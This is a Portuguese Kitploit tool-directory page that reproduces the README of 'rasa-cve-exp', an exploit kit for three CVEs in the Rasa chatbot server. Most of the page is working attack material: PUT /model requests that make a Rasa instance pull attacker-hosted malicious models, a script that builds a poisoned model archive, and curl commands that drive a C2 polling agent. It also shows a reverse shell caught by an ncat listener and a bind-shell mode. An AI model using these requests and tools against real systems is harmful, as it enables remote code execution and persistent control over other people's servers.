Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
Rasa-cve-exp — CVE-2024-49375、CVE-2021-42556、CVE-2021-41127 | Kitploit
Ferramentas/GitHubGitHub/lierbushiwo/rasa-cve-exp
Análise de VulnerabilidadesExploraçãoExploração de Aplicações WebPós-ExploraçãoTestes de PenetraçãoComando e ControleRed TeamingFerramenta de Acesso RemotoDesenvolvimento de Payloads
GitHublierbushiwo/rasa-cve-exp

Rasa-cve-exp

CVE-2024-49375、CVE-2021-42556、CVE-2021-41127

há 2 mesesAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar
Ver Repositório

Rasa-cve-exp

CVE-2021-42556

  • server-1.py

Execute diretamente

root@kitploit:~
python server-1.py

image-20260604134536291

Upload arbitrário de arquivo

root@kitploit:~
PUT /model
{"model_server":{"url":"http://192.168.244.128:5000/stage1","wait_time_between_pulls":0}}

image-20260604135046296

Resultado:

image-20260604135232815

CVE-2021-41127

  • server-1.py

Nome do modelo padrão: evil_import_model.tar.gz

Demonstração de modelo malicioso

root@kitploit:~
version: "3.1"
intents:
- greet
responses:
  utter_greet:
  - text: "PWNED_BY_CTF"
nlu:
- intent: greet
  examples: |
    - hello
    - hi
rules:
- rule: greet rule
  steps:
  - intent: greet
  - action: utter_greet

Regra de diálogo malicioso definida

Digitar greet retorna PWNED_BY_CTF

root@kitploit:~
PUT /model
{"model_server":{"url":"http://192.168.244.128:5000/stage2-probe-model","wait_time_between_pulls":0}

image-20260604134831347

Resultado:

image-20260604140230431

CVE-2024-49375

  • model.py
  • reverse_server.py

O model.py modifica dados específicos dentro do arquivo compactado

Execute diretamente; lê por padrão o modelo do diretório /model e salva no diretório atual como evil_import_model.tar.gz

image-20260604143558105

Especifique o IP de reverse shell

Nome do modelo padrão: evil_import_model.tar.gz

root@kitploit:~
python reverse_server.py --reverse-host 192.168.244.128

image-20260604140728541

Envie os dados sequencialmente

Outros payloads de exploração

Podem ser diferentes em cenários reais

  • server-2.py

Três modos


Modo C2 (Polling HTTP, recomendado)

root@kitploit:~
Máquina atacante(Rasa)          Contêiner alvo(target)
  │                            │
  ├─ Iniciar server-2.py ─────┤
  ├─ PUT /model ──→ Baixar pwnmod.py para /app/
  ├─ PUT /model ──→ Baixar modelo malicioso → import pwnmod → agent inicia
  │                            │
  │  ← GET /poll?agent=xxx ───┤  Polling a cada 3s
  ├─ /enqueue?cmd=id ─────────┤
  │  ← GET /poll ─────────────┤  Obter comando
  │  ← POST /result ──────────┤  Enviar resultado
  ├─ /last?agent=xxx ──→ Ler resultado
root@kitploit:~
# Iniciar na máquina atacante
python server-2.py --mode c2 --c2-base-url http://<IP_atacante>:8000 --port 8000

# Disparar exploit (dois passos)
curl -X PUT http://<endereço_rasa>:5005/model \
  -H "Content-Type: application/json" \
  -d '{"model_server": {"url": "http://<IP_atacante>:8000/write-module"}}'

curl -X PUT http://<endereço_rasa>:5005/model \
  -H "Content-Type: application/json" \
  -d '{"model_server": {"url": "http://<IP_atacante>:8000/model"}}'

# Enviar comando
curl "http://<IP_atacante>:8000/enqueue?cmd=id"

# Aguardar 8 segundos e ler o resultado (agent faz polling a cada 3s + tempo de execução)
curl "http://<IP_atacante>:8000/last?agent=<hostname>"

# Sem especificar agent (usa curinga)
curl "http://<IP_atacante>:8000/enqueue?cmd=whoami"
curl "http://<IP_atacante>:8000/last"

Modo Reverse (Reverse Shell)

root@kitploit:~
# 1) Máquina atacante inicia listener
ncat -lvnp 4444

# 2) Máquina atacante inicia server-2.py
python server-2.py --mode reverse --reverse-host <IP_atacante> --reverse-port 4444 --port 8000

# 3) Disparar exploit
curl -X PUT http://<endereço_rasa>:5005/model \
  -H "Content-Type: application/json" \
  -d '{"model_server": {"url": "http://<IP_atacante>:8000/write-module"}}'

curl -X PUT http://<endereço_rasa>:5005/model \
  -H "Content-Type: application/json" \
  -d '{"model_server": {"url": "http://<IP_atacante>:8000/model"}}'

# 4) nc recebe o prompt $, interação direta

Modo Bind (Shell direto, menos comum)

root@kitploit:~
python server-2.py --mode bind --bind-port 4444 --port 8000
# agent escuta em 0.0.0.0:4444 dentro do contêiner
# ncat <IP_alvo> 4444 para conectar

Explicação das portas/endereços

ParâmetroSignificado
Baixar ferramenta
--port 8000Porta de escuta do próprio server-2.py
--c2-base-urlURL base completa que o agent usará para polling no modo C2 (deve ser acessível pelo contêiner)
--reverse-hostIP alvo do reverse shell
--reverse-portPorta alvo do reverse shell